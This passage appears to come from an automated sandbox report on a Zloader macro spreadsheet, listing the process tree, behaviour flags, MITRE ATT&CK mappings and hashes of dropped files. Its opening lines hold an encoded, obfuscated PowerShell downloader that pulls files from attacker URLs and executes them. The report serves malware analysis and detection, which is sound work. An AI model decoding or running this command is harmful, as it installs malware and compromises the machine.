AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5192

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\Zloader.xlsm"
1⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5792

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
2⤵
- Process spawned unexpected child process
PID:5452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

Filesize
168KB

MD5
87e4959fefec297ebbf42de79b5c88f6

SHA1
eba50d6b266b527025cd624003799bdda9a6bc86

SHA256
4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61

SHA512
232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A64E478C-9AED-4C82-8CD5-BB420EB19DA0

Filesize
169KB

MD5
c96a28453ce158e8c628b22c7ec9a225

SHA1
b885aaaca18b261d71fe4dbec8a587c246e5a3e6

SHA256
56532a87af238b06e4cf379184c1a0e7f67bd296c737d60ebaf0ac65442aa6f0

SHA512
b021597c743811870e16a1ef527a5f0ec276f8773f1f48850525bd73fd8ecc8014855df6ab286272b7552173dd4941cf5b19b157451ee475e3a484c4f23e640b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog

Filesize
21KB

MD5
d01e9e7587d5ae3f0c0d079bd050e026

SHA1
61926a79c4a08a0b42fe37375d75086931761f20

SHA256
f909b6e06f46176035bbec544b7c2611077bcdf534e63e68d5c3006cdeda4e85

SHA512
590608a4a562deac950e3a95a012402c4b1f18ec558f6aa3816970774803f02b2751d85155a5345b6383f4d7ea490e7b6e6369e7c930a845d0fe2031342a65b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\74a0ad00a184813f0b8867eb2f8dfef7227a18a4.tbres

Filesize
2KB

MD5
1a930e40bc7a47efe035598ff617a0c1

SHA1
b35ab0ddfd033204b8066e9058b549456c5d0d0a

SHA256
8840f5c1239fafb7e88071b44b812a9aa2fd53f96801221a0e8753c8a37783f6

SHA512
f9fbbd140efa503156799b2150b6f30bd5261cc5167c8f87a055c23140739b22e3999480cd2ff829def8372e98437a1a407883dc2949cb037ea975d59526d5f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4BE0B025.wmf

Filesize
430B

MD5
3a9e0c304a278a91e7be21165ca512a6

SHA1
2a1f9805b4801360dd653ba9bd27489c106b0caf

SHA256
1798954aff10f7caca1e594962569c530d4150ec0d452d4a1befb5898bdff250

SHA512
5b978d7df1ae11739c489c8015e34983666ded86e32496b6b1d75c5bafced5b31cf5fd7047c94c7906c199f97969f3192c719b30a3fdfc88018bfa788a8d0178

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5FDA5D4A.wmf

Filesize
430B

MD5
dc5480517ad66676ee95295265e264d7

SHA1
4a936013a4e2699d0f36ef642457a372698dc471

SHA256
e80c213c671f4810af6d462cc35d939b8153162d27753b232493f859949aee99

SHA512
3d83e55daf874be471ddd75ad7b397bbd598e292a2f0a7b038f4bd26f6dd340928e93dcb6111245223eb850fdf2a19969e9642bea5e7ccaacaed3fe2e43a1c56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\77F3EBB4.wmf

Filesize
430B

MD5
10f7d55287a0e878f252f00731033f0b

SHA1
17bb4f2f0155719c74c24f7e9db304e638d92004

SHA256
80ac1e1ebc1005b2930e01204cdc8f97d27ea046f6b3ff30fc900a313cc15e79

SHA512
8fa4e06767a69d01d5057f39d905690aa8c9958660316888135db43bb16d105d663cbd34cbcb47bd8bca73eff6fe7f728300a2595dd626b633d461d34f762fac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9434AFE2.wmf

Filesize
430B

MD5
970d71164cfa79ceed92aff5c2693801

SHA1
94802274ac46f0126e690db0ec9259de9decdcc3

SHA256
634c20d9ec41bb2ee7f0622386a028ca024fc213540704d2370a8e5aaced6a0a

SHA512
279a355114358d9cb1926b1f24d6557f546f9c47aeb5a80bd65eb2fbc92540a2d956070454650fae84bd28b7214dfafd17b71814ca76b23a2ad00e589a3a7a98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9928F2C9.wmf

Filesize
430B

MD5
94cd7ae70fdf76b96a7b1e7a47dec6d5

SHA1
ffceff33901632ae8daf7e28393bd74669259fc2

SHA256
5be3fd370bd5e1000237767be6f8d605b0455b56c9866b86ef7d7a59b8689114

SHA512
44971b5e5c57f907c99922f3375a65154a303d862afc52b0e7664972d5011733485ce05b45e24986447ba21c21042832c992e4be9dc5e575893a88944967e9cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B1D2FA7B.wmf

Filesize
430B

MD5
49c1639832361f5894c27acb80fb0fa1

SHA1
fd32c896d24545959f5c1fa0d0d2a420d24d3259

SHA256
0304b9f6a9ff7c3857a17861e82e54edef1b080f8c66c179ba5f34457096eb45

SHA512
f01654e2451a0b1fdb50f6a7c2d243721d88fb94482e7eb95b443ba244bd26e6c14fb1a5739597c48390d2512a0bde13eb2336ec7e4c3b83dd441f2be07eca5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CD716A36.wmf

Filesize
430B

MD5
f327ff08f8de208b5249484690cccbef

SHA1
fd12a5cc4fa7a05dff775c52245a9cfbd8afbedb

SHA256
95c047c75a7f73688d92627920cf6f7fd388370fcedb25b1e95a898b8909e1ac

SHA512
6e130328a0cb9f73bb2efab80a557e6023628097279a1165b0a4a1267a71d779134b4f1aab1bb6166a5efe5cba31a47fd287747fe40c046ab025043d77b14a05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CEF793E8.wmf

Filesize
430B

MD5
a8825d8158c79bddc117a93af7c4cd3e

SHA1
9e1ef3eceae570d04cf7f815b09a42522f79628f

SHA256
68b43e8881fc4bf52f27f29ef4b8f14d01f1ea22f9b9347bb51e8f1121dcd1de

SHA512
97a2782d45eb21e3c85990eef6649645fa4e10d057d47b3b987b8e97c168b0aeca9d9e01833705f21b4f153f096d38103a267b3745509f1f5c1f384a378566d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CF666DC.wmf

Filesize
430B

MD5
8003e95fb7a7b746178f1cd55273b9ea

SHA1
8159b15f813f8c7f402ad89947739b6da8b00a64

SHA256
55ed9d7c65a661db37b145046bdbe6c9c35ce7b06db6915a3eb9453726526f16

SHA512
4264e4d8b70ac97d9640dfb1169c0b5026177afa3134f81451c20de238a26ba66d2885ac77c98775041a396a00f5731b85cbf9380b2dd117326445ff7b028c3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E0FAE12D.wmf

Filesize
430B

MD5
cfdc6a897131c16ed18645813a5d19f7

SHA1
c7fe789cdc0550843189ef7f46ab0d46b7131d8e

SHA256
c81bef68a201ed6d57a02250133228462b37ad7be77f3544b3fd1de66bf275c8

SHA512
4b2ce1d77525b7ee161882224652af16e2ee6addde824bef7c244ac5937d8ec6a4f301671ee92afac5b5079a3405a68aeef63edf28a8d1e8a36f5e214e77c7fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FB7C38C3.wmf

Filesize
430B

MD5
163968516c20e3ac878b231f3c18cb03

SHA1
dfc7234c372095542857b09fd5762d71bbdf5e6a

SHA256
d0a8606fe679a38852c94bb07f0e4254f159d4c7c66505526cbd87df2898e053

SHA512
f8f00bf28d4cabd91d9955a2451702976511ad462307128da348bf80060df7781f4061b96b3348d94298712628e5c57f86d99b2d324dd09d4922aecb4f40b8e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FE59E8BF.wmf

Filesize
430B

MD5
d3702962139aeb30f16082c4a5b29c03

SHA1
63440c44d040b2e3bfaab2fc7e99d4496fe59dda

SHA256
dd9eaca96785167e1554aacf6bd1b05d8a643e1dbd32ca120241f3f07e1fb86e

SHA512
47724d40b6928f8fd30a1afc434ff8e605d62ed093fe5787e1d057bd4227741b28089954c9357070744be34811541f5ac3348fba9df42500fbc45c19f0e6bbfe

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\activity-stream.discovery_stream.json.tmp

Filesize
28KB

MD5
d6f3332ed5eb6fc7f826d979a05d8b98

SHA1
81bf8595c5b53907586ad54c6ca072368899f1f3

SHA256
9e4555757f4495d119ef04ac653cf9e3f198ab723737d3a73c528b4a0927a86e

SHA512
e39b2aae4afbc7bb5634b985df48d5a32d3f3e11c86395d4fc1c2b45ac45742f11f021bd2e04b29d24d589c5a6f074d9a8fc3d95f7f772de405643229b1502d7

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\doomed\12689

Filesize
13KB

MD5
0740d62cc44f13df7e734d7d2cb1aadb

SHA1
9e4c1b3393e00e94b4aae97e1a47cca1337b835f

SHA256
28fbebd281bd93e64c510f82f2bc78f31c576fc8db894767e956fd6f10746e39

SHA512
954b229627dff030a8e8d2ea6b9a3a22e26191e56c8d412e37d9fe6d53e4e5ee15b4628dd62164b0809c1606086970c276d67d7ceec24a92a852469fb5a21315

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\doomed\21159

Filesize
46KB

MD5
6806b3820f67d9f20a5c9ce11e44fb7b

SHA1
3e5ba3e74befb5ebcc195e9d84565e362fd2b213

SHA256
487bb9efd969491c305fdc6dae04bd08e565e6829240de00bb414cc02ae070f6

SHA512
738818c9c4b57d0f3aa51523458f82df46b0a3f7ba727023d77bba722e8d54477bd063d5ebf08e1e2a36e74c7a92fcdb5c9052bcef699dd4a5d47da806fde8b5

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\doomed\27322

Filesize
12KB

MD5
8da0350c01bef9d12715a0b0acdc1bf6

SHA1
099414e7529410dd0696536731c29b623f976d7c

SHA256
032cccbc276ce441ce13498ac1000caa208c05e1d75584168ad94585e7ede207

SHA512
425706de5d0ebdc7e13ad97b579fb50e8d9a010ef42060d1429b4581306f4501778821e5ce50e4260c2fbe553712e19252398ff1ac8869ad2851cca230f6785c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\doomed\7841

Filesize
13KB

MD5
534155fcb17571d96c86a6ee11de3e0a

SHA1
c0aed4da76135f57ec673e625416f1614b30f83f

SHA256
a1017cb4b3799a383c237cf82f8a02c65dc460b973db57dd4765ac55abcca900

SHA512
e9ec8ff747631c16e35e80461f5e307b7754857c4ab3c43a82af1a5dfb74654d07f67c758e906054dc1929e75fc2d7c749aff741b6ae927b857f0a70a8e3289f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\entries\33809CDBDD69269236BB05F66DFF2693F384205C

Filesize
62KB

MD5
7f70f6db1ae7c983f4dff8242bc24ecb

SHA1
80807d978e0d6382f2fb2e2add030606c214117d

SHA256
b46ec9488bd451b2ddcf15b10299d71d342c83f523ee84ec3552cc173f1b0984

SHA512
2f8a7f6b00917336c2159a92fe6f35a11efcd4ac76d6ac560bffbeefe17207a7b6798b26562b5fc8cc7da5fcff14ae38b9efb31d8107be68ea5da5ffd087e999

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\entries\A7CF3ED5C01DEE0C144A5D0CA5CF0BA94AA917AA

Filesize
40KB

MD5
574fd39e66c79f0389db6b573f8e6e62

SHA1
fc2f5cb88e0198e0c3ccd77862218e7cdc3a948c

SHA256
c78599756275a9f4900e604dadde87c264025191f49798f71e1b36e544e76b83

SHA512
d1b18220f1f394ef0d626fa6463d332bb0c768df4ffc3462c850182071af36ea136bff328dcdf6960858c828584545b79c848b33f98b505d18b9cfce212ad604

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\entries\AB16811DE46B2D265276A15A24BED28684A3B7A4

Filesize
65KB

MD5
61ee293cb7a10af7cfa56164dea3ba0c

SHA1
91a6dfd4d4b6d30d73ee68887492f7f6b0109417

SHA256
fba70785d2583f7a9346f8674aa9d7a4324bf151bab190ac24b49b9b4f469658

SHA512
a794361900d68220da21ef1913373d5bd9e49e81e078f790a8c2e0a554fdc46da999a6cdd6419e0bf011c3366cd2a03a34054bf3340dbd62ad63655e9877d38a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\cache2\entries\CCBBC842AA6790B7BEB16A6AA2AA32FE791C9080

Filesize
75KB

MD5
598380ee0d3837c7bb9b6196abab1aec

SHA1
ba35ee8488f2ef25764c2aa603fb919f6c8bc898

SHA256
5b9b6c063933cdc4496f4fe91c19cf668c8d1d57a4644bde86f13ad7150f5619

SHA512
0d785617d57cceeae781057396cfe2ad6a319d78817cd8bd966d01ff4ed9276921f72a189d5e65463a19e730f417ae75150356e4f3936780c060b9221f031e5e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2b7acdhd.default-release\jumpListCache\dLbLlPingj8ibP6GLQ2PZQ==.ico

Filesize
25KB

MD5
6b120367fa9e50d6f91f30601ee58bb3

SHA1
9a32726e2496f78ef54f91954836b31b9a0faa50

SHA256
92c62d192e956e966fd01a0c1f721d241b9b6f256b308a2be06187a7b925f9e0

SHA512
c8d55a2c10a2ef484dedded911b8f3c2f5ecb996be6f6f425c5bd4b4f53eb620a2baccd48bac1915a81da9a792971d95ff36c3f216075d93e5fd7a462ecd784f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_liccntxi.apa.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
685B

MD5
c37838cc03bfa4f19c4ee8500b5621b4

SHA1
a493bb563a6aec8cade09c56aeda600293d220fe

SHA256
e793c3ac57cb41e9f2afb2510570cd804d521b0e8b4e6a93cff40d48a74c2302

SHA512
824b8a547a7fbf6c3647fd3287f99f9d92234bedb20d79dc1c7ae11e3bd72ed93b229e8e788b38644e42b84df0744f31f6086c0c9e7bb3775e157a01e73ad9a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
24B

MD5
4fcb2a3ee025e4a10d21e1b154873fe2

SHA1
57658e2fa594b7d0b99d02e041d0f3418e58856b

SHA256
90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

SHA512
4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
eb404f0b39c097ef749a422cecd2efa7

SHA1
54d16f47efe914d9756272152eff69c79d2f44e4

SHA256
6c487a78cf59b9fd0c780b9d4b46fb5c779e32e95061e557e8f16935584bd99c

SHA512
66350fa644df5765229e6dcb48267467161b737fffd736930198a57110511096f8958d8cbfd4a2b56d0dfbb63fb802a57ede8cf00a59ae577f779e6e5af1f0ca

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
f93afdf520d91a0a19e15e8c401425d5

SHA1
f1a17da0dec47c8e7a90cd0a5843e597c90d917a

SHA256
aec5fff02617cf697bbfe08bd8a1f6b4f1ba3aee999db16bf68fe3475a302dcf

SHA512
8a131376ec1907ca4ba532edba164ae2d9cb4540b1c5ecfa8fe2636fb3b8ee8823f1ac5dee044fcb2f61e7ec2c8c5f36e67e8b9fd0d2602f84c440ee668f4cf8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\pending_pings\a5e7c8ae-9c49-48bc-9128-e43b5464b595

Filesize
10KB

MD5
7b613f786e06017bfdc6d6e7188cee24

SHA1
f7592c3fc658155f5711481d7c739a6417a7e2ec

SHA256
03ee46b9bbb4dd1bfd0dae169a0d11e834e109276dbfb854dc57e9ffc930ee93

SHA512
8629a1d4931e1d26190ec683614eabb32dd5cc2f7f3c869ec876e9479b59ba507a114c548ad0fa067e6c179a6e7d7f0facf24e01206c3befae18585db069b514

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\datareporting\glean\pending_pings\ee9b517e-7eb1-4d0b-90b1-0d15fa571dc6

Filesize
669B

MD5
b2aa1411b0c9db406cab78e801d9ef05

SHA1
86f2aecadc8ff4edba108f402ee588aae7f21f05

SHA256
3c09bf5c0fa6dc45e889b7fe0f362d46df79c04ceccf8dd866aab1e847edbb01

SHA512
66fb1b01fac82d81b7b1a16ea20881df27352133acfc89146b6a702e46a01bad7805b85b473aec0847cf72d2e1f73b9b0ce26e901784bf667bcf15cd02045c87

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs-1.js

Filesize
7KB

MD5
3e07333de3d588118b152c09611bee9e

SHA1
67017c5f8ae6adfafbc6d3d3587593a21cc5bcf4

SHA256
2b93b7c28082694c1949bbb676891ee2145c0969ce5540f4abb71e3770c63230

SHA512
a9b3bf9d0f9d604c34c0649e8552bb7ea40f979e2eb0c6aceebdd96d6afab5a332be3bc8d841f3e79df13c9bf74cae8e9b6f685d825890a61e60cb8bf7a60d02

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs-1.js

Filesize
6KB

MD5
b155aedcfb0a290f9337cb53014acf56

SHA1
95e8ac22b23bb8bd4cc50636e2313458759610a6

SHA256
6e9988d4697acebfbfd52fc20881b62f1f26d978942edf26c35288db5cc5f06d

SHA512
acba6160c52ed830c3241e2439e0cff8e17457ae53b974714531b910ab1d816574152d5a2ea8671c5c1189a0d98cf4e777d03e61cb8c0e340bbb4bc3b8d78fc4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

Filesize
6KB

MD5
5deafbbaf869ea43f2ec9c8d6289f8b0

SHA1
b58bf80037acc7673cc261015b265bc13f0371a4

SHA256
5c2453e0a749b98313cce2da7b491993523d5672cecf34d50d4e66c481c1af49

SHA512
24e00bb4b6f09b4cfdc53e42daebdf3f4acb02737387bab20d8fafb82dd648d679304f5c2e233b99a9ac705ca6d9540f6edf419feeac91abf71270f1044e9ab4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

Filesize
6KB

MD5
fda7e5da23922fe6623189b853d30cb5

SHA1
10f03c175badadffdc34634d37545467456d4349

SHA256
6e0ed6edc6769bd21960de85a97eb38900c90e1583ae689005db5f31d2317b45

SHA512
c2b1f385ead0ab2e02e0563f7e1b4803dc567a45890f7a9b3817fa80d68585a2a11e2fd98388b6be027338d9755a91408e4ce68ed817ebbdb44356ca9f8802a0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

Filesize
6KB

MD5
67400a8441ff890963670798d70bfce3

SHA1
8d73b4377b5c89d09a434589b44cd20b2e57b5f2

SHA256
1b7def6f8520ccbfc513d8eec45b6350a4492e6b4924208307ab29cdf1e942c3

SHA512
a428435cf9020c85838f53fcfbb7ccebb63245154de9a4398967cfcb4857da058d5ec51974a94e0edffdfdfb24eefe62a60b9358450e11ede78e1f723e9e60dc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
d529003ecb5b3db5923a966e61cdbc13

SHA1
cff25fd08b27494a19cdcfea54a11f80be755017

SHA256
a29a6c9d5f9ac77ad5a603ff7194e98c9e5490e0bc1902747c4908f07f7a0e37

SHA512
93568e613957cbc4566b297dffc7826c137a68daee26fa900c4073dd94f88acd146ff66805fb875cb2651596f5c1f7d4695b37002ae23350ca0c3a40603e7972

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
fbb52f7ad318de2d9268c463eb19b6da

SHA1
b6374ff7f785c33da2b39defcf79d97315813f44

SHA256
918e26b4fc6bbe7e33eccb2c812e34296b3bbbcd61a209988cfc73eab4460526

SHA512
020325f0888a2842b929be6b24af514709f6513746ce38c302044d44d3160cb0b1af3246b76a08335c509f5cd3c02b521a5fbf7cd1d2d5ecfd60c7fab895f900

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
77570ead2b80362ab5009bc45b877c3f

SHA1
28327be228a09f241d376bbf4aa5eabd26f47475

SHA256
97dc45217fd0062e09942eb1e4162ca9725dfc3fd79576d852253b52a922f771

SHA512
